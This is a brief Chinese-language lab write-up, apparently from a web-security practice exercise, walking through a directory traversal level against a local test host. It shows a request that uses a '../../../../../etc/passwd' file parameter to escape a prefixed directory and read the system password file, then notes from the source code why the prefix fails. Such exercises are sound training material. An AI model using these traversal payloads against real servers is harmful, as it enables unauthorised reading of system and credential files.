我们打开第二个图片
进行观察
跟上一关一样,我们观察得知
我们尝试修改文件名称
http://192.168.20.157/dirtrav/example2.php?file=/var/www/files/etc/passwd
结果空白
可能是不存在这个目录
我们尝试
http://192.168.20.157/dirtrav/example2.php?file=/var/www/files/../../../../../etc/passwd
结果
我们打开靶机
观察源码
发现会给一个文件名加上一个文件目录路径
然而容易被../../进行过滤